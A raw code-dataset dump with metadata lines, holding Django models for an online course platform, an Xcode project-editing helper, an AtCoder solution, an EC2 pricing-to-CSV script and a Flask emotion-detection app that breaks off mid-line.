models.PositiveIntegerField(\"导师费用余额\", help_text=\"这个学员的导师费用,每有惩罚,需在此字段同时扣除\")\n order_detail = models.OneToOneField(\"OrderDetail\") # 使订单购买后支持填写报名表\n\n def __str__(self):\n return \"%s:%s\" % (self.account, self.degree_course)\n\n class Meta:\n unique_together = ('account', 'degree_course')\n\n\nclass Coupon(models.Model):\n \"\"\"优惠券生成规则\"\"\"\n name = models.CharField(max_length=64, verbose_name=\"活动名称\")\n brief = models.TextField(blank=True, null=True, verbose_name=\"优惠券介绍\")\n coupon_type_choices = ((0, '通用券'), (1, '满减券'), (2, '折扣券'))\n coupon_type = models.SmallIntegerField(choices=coupon_type_choices, default=0, verbose_name=\"券类型\")\n\n money_equivalent_value = models.IntegerField(verbose_name=\"等值货币\")\n off_percent = models.PositiveSmallIntegerField(\"折扣百分比\", help_text=\"只针对折扣券,例7.9折,写79\", blank=True, null=True)\n minimum_consume = models.PositiveIntegerField(\"最低消费\", default=0, help_text=\"仅在满减券时填写此字段\")\n\n content_type = models.ForeignKey(ContentType, blank=True, null=True)\n object_id = models.PositiveIntegerField(\"绑定课程\", blank=True, null=True, help_text=\"可以把优惠券跟课程绑定\")\n content_object = GenericForeignKey('content_type', 'object_id')\n\n quantity = models.PositiveIntegerField(\"数量(张)\", default=1)\n open_date = models.DateField(\"优惠券领取开始时间\")\n close_date = models.DateField(\"优惠券领取结束时间\")\n valid_begin_date = models.DateField(verbose_name=\"有效期开始时间\", blank=True, null=True)\n valid_end_date = models.DateField(verbose_name=\"有效结束时间\", blank=True, null=True)\n coupon_valid_days = models.PositiveIntegerField(verbose_name=\"优惠券有效期(天)\", blank=True, null=True,\n help_text=\"自券被领时开始算起\")\n date = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return \"%s(%s)\" % (self.get_coupon_type_display(), self.name)\n\n def save(self, *args, **kwargs):\n if not self.coupon_valid_days or (self.valid_begin_date and self.valid_end_date):\n if self.valid_begin_date and self.valid_end_date:\n if self.valid_end_date <= self.valid_begin_date:\n raise ValueError(\"valid_end_date 有效期结束日期必须晚于 valid_begin_date \")\n if self.coupon_valid_days == 0:\n raise ValueError(\"coupon_valid_days 有效期不能为0\")\n if self.close_date < self.open_date:\n raise ValueError(\"close_date 优惠券领取结束时间必须晚于 open_date优惠券领取开始时间 \")\n\n super(Coupon, self).save(*args, **kwargs)\n\n\nclass CouponRecord(models.Model):\n \"\"\"优惠券发放、消费纪录\"\"\"\n coupon = models.ForeignKey(\"Coupon\")\n number = models.CharField(max_length=64, unique=True)\n # 有问题:不能为空\n account = models.ForeignKey(\"Account\", verbose_name=\"拥有者\")\n # 有问题:去掉3\n status_choices = ((0, '未使用'), (1, '已使用'), (2, '已过期'), (3, '未领取'))\n status = models.SmallIntegerField(choices=status_choices, default=0)\n # 有问题:不能为空\n get_time = models.DateTimeField(blank=True, null=True, verbose_name=\"领取时间\", help_text=\"用户领取时间\")\n\n used_time = models.DateTimeField(blank=True, null=True, verbose_name=\"使用时间\")\n order = models.ForeignKey(\"Order\", blank=True, null=True, verbose_name=\"关联订单\") # 一个订单可以有多个优惠券\n date = models.DateTimeField(auto_now_add=True, verbose_name=\"生成时间\")\n\n # _coupon = GenericRelation(\"Coupon\")\n # def __str__(self):\n # return '%s-%s-%s' % (self.account, self.number, self.status)\n\n\nclass Order(models.Model):\n \"\"\"订单\"\"\"\n payment_type_choices = ((0, '微信'), (1, '支付宝'), (2, '优惠码'), (3, '贝里'))\n payment_type = models.SmallIntegerField(choices=payment_type_choices)\n payment_number = models.CharField(max_length=128, verbose_name=\"支付第3方订单号\", null=True, blank=True)\n order_number = models.CharField(max_length=128, verbose_name=\"订单号\", unique=True) # 考虑到订单合并支付的问题\n account = models.ForeignKey(\"Account\")\n actual_amount = models.FloatField(verbose_name=\"实付金额\")\n\n status_choices = ((0, '交易成功'), (1, '待支付'), (2, '退费申请中'), (3, '已退费'), (4, '主动取消'), (5, '超时取消'))\n status = models.SmallIntegerField(choices=status_choices, verbose_name=\"状态\")\n date = models.DateTimeField(auto_now_add=True, verbose_name=\"订单生成时间\")\n pay_time = models.DateTimeField(blank=True, null=True, verbose_name=\"付款时间\")\n cancel_time = models.DateTimeField(blank=True, null=True, verbose_name=\"订单取消时间\")\n\n def __str__(self):\n return \"%s\" % self.order_number\n\n\nclass OrderDetail(models.Model):\n \"\"\"订单详情\"\"\"\n order = models.ForeignKey(\"Order\")\n\n content_type = models.ForeignKey(ContentType) # 可关联普通课程或学位\n object_id = models.PositiveIntegerField()\n content_object = GenericForeignKey('content_type', 'object_id')\n\n original_price = models.FloatField(\"课程原价\")\n price = models.FloatField(\"折后价格\")\n content = models.CharField(max_length=255, blank=True, null=True) # ?\n valid_period_display = models.CharField(\"有效期显示\", max_length=32) # 在订单页显示\n valid_period = models.PositiveIntegerField(\"有效期(days)\") # 课程有效期\n memo = models.CharField(max_length=255, blank=True, null=True)\n\n # def __str__(self):\n # return \"%s - %s - %s\" % (self.order, self.content_type, self.price)\n\n class Meta:\n # unique_together = (\"order\", 'course')\n unique_together = (\"order\", 'content_type', 'object_id')\n\n\nclass StudyRecord(models.Model):\n \"\"\"学位课程的模块学习进度\n 报名学位课程后,每个模块会立刻生成一条学习纪录\n \"\"\"\n enrolled_degree_course = models.ForeignKey(\"EnrolledDegreeCourse\")\n course_module = models.ForeignKey(\"Course\", verbose_name=\"学位模块\", limit_choices_to={'course_type': 2})\n open_date = models.DateField(blank=True, null=True, verbose_name=\"开通日期\")\n end_date = models.DateField(blank=True, null=True, verbose_name=\"完成日期\")\n status_choices = ((2, '在学'), (1, '未开通'), (0, '已完成'))\n status = models.SmallIntegerField(choices=status_choices, default=1)\n\n class Meta:\n unique_together = ('enrolled_degree_course', 'course_module')\n\n def __str__(self):\n return '%s-%s' % (self.enrolled_degree_course, self.course_module)\n\n def save(self, *args, **kwargs):\n if self.course_module.degree_course_id != self.enrolled_degree_course.degree_course_id:\n raise ValueError(\"学员要开通的模块必须与其报名的学位课程一致!\")\n\n super(StudyRecord, self).save(*args, **kwargs)\n\n\nclass HomeworkRecord(models.Model):\n \"\"\"学员作业记录及成绩\"\"\"\n homework = models.ForeignKey(\"Homework\")\n student = models.ForeignKey(\"EnrolledDegreeCourse\", verbose_name=\"学生\")\n score_choices = ((100, 'A+'),\n (90, 'A'),\n (85, 'B+'),\n (80, 'B'),\n (70, 'B-'),\n (60, 'C+'),\n (50, 'C'),\n (40, 'C-'),\n (-1, 'D'),\n (0, 'N/A'),\n (-100, 'COPY'),\n )\n score = models.SmallIntegerField(verbose_name=\"分数\", choices=score_choices, null=True, blank=True)\n mentor = models.ForeignKey(\"Account\", related_name=\"my_stu_homework_record\", limit_choices_to={'role': 1},\n verbose_name=\"导师\")\n mentor_comment = models.TextField(verbose_name=\"导师批注\", blank=True, null=True) # 导师\n status_choice = (\n (0, '待批改'),\n (1, '已通过'),\n (2, '不合格'),\n )\n status = models.SmallIntegerField(verbose_name='作业状态', choices=status_choice, default=0)\n\n submit_num = models.SmallIntegerField(verbose_name='提交次数', default=0)\n correct_date = models.DateTimeField('备注日期', blank=True, null=True)\n note = models.TextField(blank=True, null=True)\n date = models.DateTimeField(\"作业提交日期\", auto_now_add=True)\n\n check_date = models.DateTimeField(\"批改日期\", null=True, blank=True)\n\n update_time = models.DateTimeField(auto_now=True, verbose_name=\"提交日期\")\n\n # homework_path = models.CharField(verbose_name='作业路径', max_length=256,blank=True,null=True) 作业路径可以动态拿到,没必要存\n\n reward_choice = ((0, '新提交'),\n (1, '按时提交'),\n (2, '未按时提交'),\n (3, '成绩已奖励'),\n (4, '成绩已处罚'),\n (5, '未作按时检测'),\n )\n reward_status = models.SmallIntegerField(verbose_name='作业记录奖惩状态', default=0)\n\n def __str__(self):\n return \"%s %s\" % (self.homework, self.student)\n\n class Meta:\n unique_together = (\"homework\", \"student\")\n\n\nclass StuFollowUpRecord(models.Model):\n \"\"\"学员跟进记录\"\"\"\n enrolled_degree_course = models.ForeignKey(\"EnrolledDegreeCourse\", verbose_name=\"学生\")\n mentor = models.ForeignKey(\"Account\", related_name='mentor', limit_choices_to={'role': 1}, verbose_name=\"导师\")\n followup_tool_choices = ((0, 'QQ'), (1, '微信'), (2, '电话'), (3, '系统通知'))\n followup_tool = models.SmallIntegerField(choices=followup_tool_choices, default=1)\n record = models.TextField(verbose_name=\"跟进记录\")\n attachment_path = models.CharField(max_length=128, blank=True, null=True, verbose_name=\"附件路径\", help_text=\"跟进记录的截图等\")\n date = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return \"%s --%s --%s\" % (self.enrolled_degree_course, self.record, self.date)\n\n\nclass Question(models.Model):\n \"\"\"课程提问\"\"\"\n name = models.CharField(max_length=128, blank=True, null=True, verbose_name=\"问题概要\", db_index=True)\n question_type_choices = ((0, '专题课程问题'), (1, '学位课程问题'))\n question_type = models.SmallIntegerField(choices=question_type_choices, default=0, verbose_name=\"来源\")\n account = models.ForeignKey(\"Account\", verbose_name=\"提问者\")\n degree_course = models.ForeignKey(\"DegreeCourse\", blank=True, null=True) # 若是针对整个学位课程的提问,关联这个\n course_section = models.ForeignKey(\"CourseSection\", blank=True, null=True) # 针对整个学位课程的提问不需关联特定课时\n content = models.TextField(max_length=1024, verbose_name=\"问题内容\")\n enquiries_count = models.IntegerField(default=0, verbose_name=\"同问者计数\")\n attachment_path = models.CharField(max_length=128, blank=True, null=True, verbose_name=\"附件路径\", help_text=\"问题记录的截图等\")\n date = models.DateTimeField(auto_now_add=True)\n status_choices = ((0, '待解答'), (1, '已解答'), (2, '已关闭'))\n status = models.SmallIntegerField(choices=status_choices, default=0)\n\n def __str__(self):\n return \"%s\" % self.name\n\n def save(self, *args, **kwargs):\n if self.degree_course is None and self.course_section is None:\n raise ValueError(\"提的问题必须关联学位课程或具体课时!\")\n\n super(Question, self).save(*args, **kwargs)\n\n\nclass Answer(models.Model):\n \"\"\"问题解答\"\"\"\n question = models.ForeignKey(\"Question\", verbose_name=\"问题\")\n content = models.TextField(verbose_name=\"回答\")\n account = models.ForeignKey(\"Account\", verbose_name=\"回答者\")\n agree_number = models.IntegerField(default=0, verbose_name=\"点赞数\")\n disagree_number = models.IntegerField(default=0, verbose_name=\"点踩数\")\n answer_date = models.DateTimeField(auto_now=True, verbose_name=\"日期\")\n\n def __str__(self):\n return \"%s\" % self.question\n\n\nclass AnswerComment(models.Model):\n \"\"\"答案回复评论\"\"\"\n answer = models.ForeignKey(\"Answer\")\n reply_to = models.ForeignKey(\"self\", blank=True, null=True, verbose_name=\"基于评论的评论\")\n comment = models.TextField(max_length=512, verbose_name=\"评论内容\")\n attachment_path = models.CharField(max_length=128, blank=True, null=True, verbose_name=\"附件路径\", help_text=\"跟进记录的截图等\")\n account = models.ForeignKey(\"Account\", verbose_name=\"评论者\")\n date = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return \"%s - %s\" % (self.account, self.comment)\n\n\nclass QACounter(models.Model):\n \"\"\" 问题和回答的赞同数量统计 \"\"\"\n content_type = models.ForeignKey(ContentType)\n object_id = models.PositiveIntegerField()\n content_object = GenericForeignKey('content_type', 'object_id')\n data_type_choices = ((0, '点赞'), (1, '踩'), (2, '同问'))\n data_type = models.SmallIntegerField(choices=data_type_choices)\n account = models.ForeignKey(\"Account\")\n date = models.DateTimeField(auto_now=True)\n\n class Meta:\n unique_together = (\"content_type\", 'object_id', \"account\")\n\n\nclass Tags(models.Model):\n tag_type_choices = ((0, '文章标签'), (1, '课程评价标签'), (2, '用户感兴趣技术标签'))\n tag_type = models.SmallIntegerField(choices=tag_type_choices)\n name = models.CharField(max_length=64, unique=True, db_index=True)\n\n def __str__(self):\n return self.name\n\n\nclass TransactionRecord(models.Model):\n \"\"\"贝里交易纪录\"\"\"\n account = models.ForeignKey(\"Account\")\n amount = models.IntegerField(\"金额\")\n balance = models.IntegerField(\"账户余额\")\n transaction_type_choices = ((0, '收入'), (1, '支出'), (2, '退款'), (3, \"提现\")) # 2 为了处理 订单过期未支付时,锁定期贝里的回退\n transaction_type = models.SmallIntegerField(choices=transaction_type_choices)\n\n content_type = models.ForeignKey(ContentType, blank=True, null=True)\n object_id = models.PositiveIntegerField(blank=True, null=True, verbose_name=\"关联对象\")\n content_object = GenericForeignKey('content_type', 'object_id')\n\n transaction_number = models.CharField(unique=True, verbose_name=\"流水号\", max_length=128)\n date = models.DateTimeField(auto_now_add=True)\n memo = models.CharField(max_length=128, blank=True, null=True)\n\n def __str__(self):\n return \"%s\" % self.transaction_number\n\n\nclass Notification(models.Model):\n \"\"\"消息通知纪录\"\"\"\n account = models.ForeignKey(\"Account\", blank=True, null=True, help_text=\"不填用户的话代表给未注册用户发通知\")\n notify_obj = models.CharField(max_length=64, verbose_name='通知对象', help_text='account_id,email、mobile、open_id')\n content = models.TextField(max_length=1024)\n date = models.DateTimeField(auto_now_add=True, verbose_name='消息添加时间')\n msg_type_choices = (\n (0, \"奖惩通知\"),\n (1, \"订单通知\"),\n (2, \"专题课程报名\"),\n (3, \"课程过期\"),\n (4, \"课程评论\"),\n (5, \"优惠券通知\"),\n (6, \"课程开课通知\"),\n (7, \"学位课程作业\"),\n (8, \"学位课程问答\"),\n (9, \"资讯阅读通知\"),\n (11, \"课程问答\"),\n (12, \"学位课程报名\"),\n (13, \"导师分配通知\"),\n (15, \"学位学习事务通知\"),\n (16, \"其他\"),\n )\n\n msg_type = models.SmallIntegerField(choices=msg_type_choices)\n notify_type_choices = ((0, '站内信'), (1, '短信'), (2, '邮件'), (3, '微信'), (4, '其它'))\n notify_type = models.SmallIntegerField(choices=notify_type_choices)\n\n # notify_belong_choices = ((0, '站内事务通知'), (4, '课程相关通知'), (2, '资讯相关通知'))\n # notify_belong = models.SmallIntegerField(choices=notify_belong_choices)\n\n content_type = models.ForeignKey(ContentType, blank=True, null=True)\n object_id = models.PositiveIntegerField(blank=True, null=True, verbose_name=\"关联对象\")\n content_object = GenericForeignKey('content_type', 'object_id')\n\n apply_now = models.BooleanField(default=False, help_text=\"如果需要立刻通知用户,请勾选\", verbose_name=\"是否立即执行\")\n applied_status = models.BooleanField(default=False, help_text=\"消息通知是否已被执行\", verbose_name=\"是否已被执行\")\n excution_status = models.BooleanField(\"执行是否成功\", default=False)\n excution_result = models.TextField(\"执行返回结果\", blank=True, null=True)\n applied_date = models.DateTimeField(blank=True, null=True, verbose_name=\"通知日期时间\", help_text=\"若不是立刻执行,需设置执行时间\")\n\n def __str__(self):\n return '%s-%s-%s' % (self.notify_obj, self.msg_type, self.notify_type)\n\n\nclass MentorGroup(models.Model):\n \"\"\"导师组\"\"\"\n\n name = models.CharField(max_length=64, unique=True)\n brief = models.TextField(blank=True, null=True)\n mentors = models.ManyToManyField(\"Account\", limit_choices_to={'role': 1})\n\n def __str__(self):\n return self.name\n\n\nclass Account(models.Model):\n username = models.CharField(\"用户名\", max_length=64, unique=True)\n email = models.EmailField(\n verbose_name='email address',\n max_length=255,\n unique=True,\n blank=True,\n null=True\n )\n\n uid = models.CharField(max_length=64, unique=True, help_text='微信用户绑定和CC视频统计') # 与第3方交互用户信息时,用这个uid,以避免泄露敏感用户信息\n mobile = models.BigIntegerField(verbose_name=\"手机\", unique=True, help_text=\"用于手机验证码登录\")\n qq = models.CharField(verbose_name=\"QQ\", max_length=64, blank=True, null=True, db_index=True)\n weixin = models.CharField(max_length=128, blank=True, null=True, db_index=True, verbose_name=\"微信\")\n profession = models.ForeignKey(\"Profession\", verbose_name=\"职位信息\", blank=True, null=True) # 职位相关信息,注册时必选\n tags = models.ManyToManyField(\"Tags\", blank=True, verbose_name=\"感兴趣的标签\")\n city = models.ForeignKey(\"City\", verbose_name=\"城市\", blank=True, null=True) # 所在城市,注册时必填, 通过城市能找到对应的省份\n signature = models.CharField('个人签名', blank=True, null=True, max_length=255)\n brief = models.TextField(\"个人介绍\", blank=True, null=True)\n\n openid = models.CharField(max_length=128, blank=True, null=True)\n gender_choices = ((0, '保密'), (1, '男'), (2, '女'))\n gender = models.SmallIntegerField(choices=gender_choices, default=0, verbose_name=\"性别\")\n degree_choices = ((0, \"学历\"), (1, '高中以下'), (2, '中专/高中'), (3, '大专'), (4, '本科'), (5, '硕士'), (6, '博士'))\n degree = models.PositiveSmallIntegerField(choices=degree_choices, blank=True,\n null=True, default=0, verbose_name=\"学历\")\n birthday = models.DateField(blank=True, null=True, verbose_name=\"生日\")\n id_card = models.CharField(max_length=32, blank=True, null=True, verbose_name=\"身份证号或护照号\")\n password = models.CharField('password', max_length=128,\n help_text=mark_safe('''重置密码'''))\n is_active = models.BooleanField(default=True, verbose_name=\"账户状态\")\n is_staff = models.BooleanField(verbose_name='staff status', default=False, help_text='决定着用户是否可登录管理后台')\n name = models.CharField(max_length=32, default=\"\", verbose_name=\"真实姓名\")\n head_img = models.CharField(max_length=128, default='/static/frontend/head_portrait/logo@2x.png',\n verbose_name=\"个人头像\")\n role_choices = ((0, '学员'), (1, '导师'), (2, '讲师'), (3, '管理员'))\n role = models.SmallIntegerField(choices=role_choices, default=0, verbose_name=\"角色\")\n\n # #此处通过transaction_record表就可以查到,所以不用写在这了。错错错\n balance = models.PositiveIntegerField(default=0, verbose_name=\"可提现和使用余额\")\n\n memo = models.TextField('备注', blank=True, null=True, default=None)\n date_joined = models.DateTimeField(auto_now_add=True, verbose_name=\"注册时间\")\n\n class Meta:\n verbose_name = '账户信息'\n verbose_name_plural = \"账户信息\"\n\n def save(self, *args, **kwargs):\n if not self.pk:\n # This code only happens if the objects is not in the database yet. Otherwise it would have pk\n m = hashlib.md5()\n m.update(self.username.encode(encoding=\"utf-8\"))\n self.uid = m.hexdigest()\n super(Account, self).save(*args, **kwargs)\n\n def __str__(self):\n return self.username\n\n\nclass UserAuthToken(models.Model):\n \"\"\"\n 用户Token表\n \"\"\"\n user = models.OneToOneField(to=\"Account\")\n token = models.CharField(max_length=40)\n created = models.DateTimeField(auto_now_add=True)\n\n def save(self, *args, **kwargs):\n import datetime\n\n self.token = self.generate_key()\n self.created = datetime.datetime.utcnow()\n return super(UserAuthToken, self).save(*args, **kwargs)\n\n def generate_key(self):\n import os\n import binascii\n return binascii.hexlify(os.urandom(20)).decode()\n\n\nclass Province(models.Model):\n \"\"\"\n 省份表\n \"\"\"\n code = models.IntegerField(verbose_name=\"省代码\", unique=True)\n name = models.CharField(max_length=64, verbose_name=\"省名称\", unique=True)\n\n def __str__(self):\n return \"{} - {}\".format(self.code, self.name)\n\n class Meta:\n verbose_name = \"省\"\n verbose_name_plural = verbose_name\n\n\nclass City(models.Model):\n \"\"\"\n 城市表\n \"\"\"\n code = models.IntegerField(verbose_name=\"市\", unique=True)\n name = models.CharField(max_length=64, verbose_name=\"市名称\") # 城市名可能有重复\n province = models.ForeignKey(\"Province\")\n\n def __str__(self):\n return \"{} - {}\".format(self.code, self.name)\n\n class Meta:\n verbose_name = \"市\"\n verbose_name_plural = verbose_name\n\n\nclass Industry(models.Model):\n \"\"\"\n 行业表\n \"\"\"\n code = models.IntegerField(verbose_name=\"行业代码\", unique=True)\n name = models.CharField(max_length=64, verbose_name=\"行业名称\")\n\n def __str__(self):\n return \"{} - {}\".format(self.code, self.name)\n\n class Meta:\n verbose_name = \"行业信息\"\n verbose_name_plural = verbose_name\n\n\nclass Profession(models.Model):\n \"\"\"\n 职位表,与行业表外键关联\n \"\"\"\n code = models.IntegerField(verbose_name=\"职位代码\")\n name = models.CharField(max_length=64, verbose_name=\"职位名称\")\n industry = models.ForeignKey(\"Industry\")\n\n def __str__(self):\n return \"{} - {}\".format(self.code, self.name)\n\n class Meta:\n unique_together = (\"code\", \"industry\")\n verbose_name = \"职位信息\"\n verbose_name_plural = verbose_name\n\n\nclass BulletScreen(models.Model):\n account = models.ForeignKey(\"Account\") # 发弹幕的人\n content = models.CharField(max_length=255) # 弹幕详情\n course_section = models.ForeignKey(\"CourseSection\") # 具体发送到哪个课时(视频 )\n play_point = models.IntegerField() # 发送弹幕的时间处于该课时视频的具体秒数\n date = models.DateTimeField(auto_now_add=True) # 弹幕存储时间\n\n\nclass Feedback(models.Model):\n \"\"\"用户反馈表\"\"\"\n name = models.CharField(max_length=32, blank=True, null=True)\n contact = models.CharField(max_length=64, blank=True, null=True)\n feedback_type_choices = ((0, '网站优化建议'), (1, '烂!我想吐槽'), (2, '网站bug反馈'))\n feedback_type = models.SmallIntegerField(choices=feedback_type_choices)\n content = models.TextField(max_length=1024)\n date = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return self.name\n","repo_name":"WuPeiqi/luffycity","sub_path":"repository/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":47677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8561106547","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author: fasthro\n# @Date: 2016-11-15 11:21:33\n# @Last Modified by: fasthro\n# @Last Modified time: 2016-11-15 11:21:57\nimport shutil\nimport os\nimport re\nimport platform\nfrom pbxproj import *\nimport shutil\n# 修改工程\nfrom pbxproj.pbxextensions import TreeType\n\n# 打包之前准备工作\nclass PreparatoryWork:\n def __init__(self, frompath, topath, filefromls, filetols, folderfromls, foldertols):\n\n\n # from 根目录\n self.from_path = frompath\n # to 根目录\n self.to_path = topath\n\n # 需要 copy 的文件\n self.file_from_path_list = filefromls\n self.file_to_path_list = filetols\n\n # 需要 copy 的目录\n self.folder_from_list = folderfromls\n print(\"folder_from_list:===>\")\n print(folderfromls)\n print(\"\\n\")\n self.folder_to_path_list = foldertols\n print(\"foldertols:===>\")\n print(foldertols)\n print(\"\\n\")\n\n # copy\n self.copy(filefromls, filetols)\n self.copy(folderfromls, foldertols)\n\n def copy(self, fs, ts):\n\n for index in range(len(fs)):\n frompath = os.path.join(self.from_path, fs[index])\n topath_temp = os.path.join(self.to_path, ts[index])\n topath = os.path.join(topath_temp, fs[index])\n\n # 如果已经存在就删除\n if os.path.exists(topath):\n if os.path.isdir(topath):\n shutil.rmtree(topath)\n else:\n os.remove(topath)\n\n if os.path.isfile(frompath):\n print(\"copy %s -> %s\" % (frompath, topath))\n shutil.copy(frompath, topath)\n else:\n print(\"copy %s -> %s\" % (frompath, topath))\n shutil.copytree(frompath, topath)\n\n\n# Xcode *.pbxproj 相关设置\nclass Xcode:\n \"\"\"\n ·xpath : xcode 根目录\n ·folders : 需要添加的文件夹列表\n ·files : 需要添加的文件列表\n \"\"\"\n\n def __init__(self, xpath=None, folders=[], files=[]):\n\n # xcode project path\n self.xcode_project_path = xpath\n\n # xcode pbxproj path\n if platform.system() == \"Windows\":\n self.xcode_pbxproj_path = os.path.join(xpath, 'Unity-iPhone.xcodeproj/project.pbxproj.xml')\n else:\n self.xcode_pbxproj_path = os.path.join(xpath, 'Unity-iPhone.xcodeproj/project.pbxproj')\n print(\"XcodeProjectPath=%s\"%(self.xcode_pbxproj_path))\n # need add folders\n self.folders = folders\n\n # need add files\n self.files = files\n\n self.project = None\n\n if self.xcode_pbxproj_path is not None:\n pstr_xml = self.xcode_pbxproj_path[len(self.xcode_pbxproj_path) - 4: len(self.xcode_pbxproj_path)]\n pstr_proj = self.xcode_pbxproj_path[len(self.xcode_pbxproj_path) - 8: len(self.xcode_pbxproj_path)]\n if pstr_xml == '.xml':\n self.project = XcodeProject.LoadFromXML(self.xcode_pbxproj_path)\n elif pstr_proj == '.pbxproj':\n self.project = XcodeProject.load(self.xcode_pbxproj_path)\n else:\n print(\"xcode load error path = [%s]\" % self.xcode_pbxproj_path)\n\n if self.project is None:\n print(\"Xcode load error\")\n else:\n pass\n\n # temp file list\n self.temp_files = None\n self.temp_folder = None\n\n def addfileToXcode(self):\n self.addfiles(self.files)\n\n def addfolderToXcode(self):\n self.addfolders(self.folders)\n\n # 导入文件设置 -fno-objc-arc\n def set_file_seting(self, f_path, flag):\n if self.project:\n f_id = self.project.get_file_id_by_path(f_path)\n files = self.project.get_build_files(f_id)\n\n for f in files:\n f.add_compiler_flag(flag)\n\n # 添加文件夹\n def addfolders(self, folders):\n \n if self.project:\n self.temp_files = []\n for dpp in folders:\n dp = os.path.join(self.xcode_project_path, dpp)\n self.project.remove_group_by_name(\"Native\")\n if os.path.exists(dp):\n print (\"add folder to xcode path = [%s]\" % dp)\n self.project.add_group(\"Native\" ,dp , self.project.get_or_create_group('Classes'), TreeType.ABSOLUTE)\n # self.project.add_folder(dp, self.project.get_or_create_group('Classes'), None, False, True, self.project.get_target_by_name(\"UnityFramework\"))\n # add folder file to xcode\n self.getfilesdir(dp)\n\n else:\n print(\"add folder path = [%s] is not exist!\" % dp)\n\n print(\"add folder file : \")\n if len(self.temp_files) > 0:\n self.addfiles(self.temp_files)\n\n def getfilesdir(self, dp):\n for f in os.listdir(dp):\n f_p = os.path.join(dp, f)\n if os.path.isfile(f_p):\n self.temp_files.append(f_p)\n else:\n cp = re.compile(r\".bundle|.framework\")\n gp = cp.search(f_p)\n if gp is not None:\n self.temp_files.append(f_p)\n else:\n self.getfilesdir(f_p)\n\n def addfiles(self, files):\n if self.project:\n for fpp in files:\n fp = os.path.join(self.xcode_project_path, fpp)\n if os.path.exists(fp):\n print(\"add file to xcode path = [%s]\" % fp)\n self.project.add_file(fp, self.project.get_or_create_group('Native'), \"Classes/Native\", \"UnityFramework\", False)\n else:\n print(\"add file path = [%s] is not exist!\" % fp)\n\n def addframework(self, frameworks=[], weaks=[], isbase=True):\n if self.project:\n framework_parent = self.project.get_or_create_group('Frameworks')\n for index in range(len(frameworks)):\n fw = frameworks[index]\n we = weaks[index]\n\n comp = re.compile('.framework$')\n match = comp.search(fw)\n\n tree = None\n sr = \"other\"\n\n if isbase == True:\n tree = \"SDKROOT\"\n sr = \"base\"\n\n weak = we == \"True\"\n\n if match:\n print(\n \"add %s framework [ %s ] weak = %s\" % (sr, fw, we))\n\n self.project.add_file(fw, parent=framework_parent, weak=weak, tree=tree)\n else:\n print(\n \"add %s libraries [ %s ]\" % (sr, fw))\n\n self.project.add_file(fw, parent=framework_parent, weak=False, tree=tree)\n\n def save(self, fp=None):\n if self.project:\n if fp is not None:\n self.project.save(fp)\n else:\n self.project.save()\n print( \"save project\")\n","repo_name":"dingcode-icu/ucmd","sub_path":"test/.ucmd_hook/lib/xcode_mode.py","file_name":"xcode_mode.py","file_ext":"py","file_size_in_byte":6983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30032377200","text":"N = int(input())\nflowers = list(map(int,input().split(\" \")))\nans = 0\n\ndef is_clear(l):\n for ele in l:\n if(ele!=0):\n return False\n return True\n\nwhile(not is_clear(flowers)):\n tmp_l = []\n #水やり範囲を決める処理\n for i,flower in enumerate(flowers):\n if(flower!=0):\n tmp_l.append(i)\n else:\n if(len(tmp_l)!=0):\n break\n\n\n if(len(tmp_l)>=2):\n water = min(flowers[tmp_l[0]:tmp_l[-1]+1])\n for i in tmp_l:\n flowers[i] -= water\n else:\n water = flowers[tmp_l[0]]\n flowers[tmp_l[0]] -= water\n\n ans += water\n\nprint(ans)\n","repo_name":"gempei/Atcoder","sub_path":"20190707_ABC133/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15781367893","text":"#! /usr/bin/env python\n\nimport sys\nimport json\nimport csv\n\ndef load_file(fn):\n with open(fn, 'r') as f:\n return json.loads(f.read())\n\ndef analyze(j):\n print(len(j))\n\n out_rows = []\n for info in j:\n instance_type = info['instance_type']\n try:\n on_demand = info['pricing']['us-east-1']['linux']['ondemand']\n # This is a dict\n reserved = info['pricing']['us-east-1']['linux']['reserved']\n\n reserved['instance_type'] = instance_type\n reserved['on_demand'] = on_demand\n\n out_rows.append(reserved)\n except Exception as e:\n print('Failed to parse', instance_type)\n\n return out_rows\n\ndef write_csv(fn, rows):\n with open(fn, 'w') as f:\n writer = csv.DictWriter(f, fieldnames=rows[0].keys())\n writer.writeheader()\n writer.writerows(rows)\n\nif __name__ == '__main__':\n fn_in = sys.argv[1]\n fn_out = sys.argv[2]\n\n j = load_file(fn_in)\n out = analyze(j)\n write_csv(fn_out, out)\n","repo_name":"dangoldin/analyze-ec2instance.info","sub_path":"analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38582176318","text":"''' Executing this function initiates the application of emotion detector\n to be executed over the Flask channel and deployed on\n localhost:5000.\n'''\nfrom flask import Flask, render_template, request\nfrom EmotionDetection.emotion_detection import emotion_detector\napp = Flask(\"emotion detector\")\n\n@app.route(\"/emotionDetector\")\ndef emo_detector():\n ''' This code receives the text from the HTML interface and \n runs emotion detection over it using emotion_detector()\n function. The output returned shows the responce for the provided text.\n '''\n text_to_detecte = request.args.get('textToDetecte')\n emotion = emotion_detector(text_to_detecte)\n anger_score = emotion['anger']\n disgust_score = emotion['disgust']\n fear_score = emotion['fear']\n joy_score = emotion['joy']\n sadness_score = emotion ['sadness']\n dominant_emotion = joy_score\n if dominant_emotion is None:\n return \"Invalid text! Please try again!.\"\n return \"For the given statement, the system response is 'anger': {},\"+\\\n \"'disgust': {}, 'fear': {}, 'joy': {},'sadness':{} and 'dominant_emotion':{}.\".format+\\\n (anger_score, disgust_score, fear_score, joy_score, sadness_score, dominant_emotion )\n\n@app.route(\"/\")\ndef render_index_page():\n '''\n This function initiates the rendering of the main application\n page over the Flask channel\n '''\n return render_template('index.html')\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", 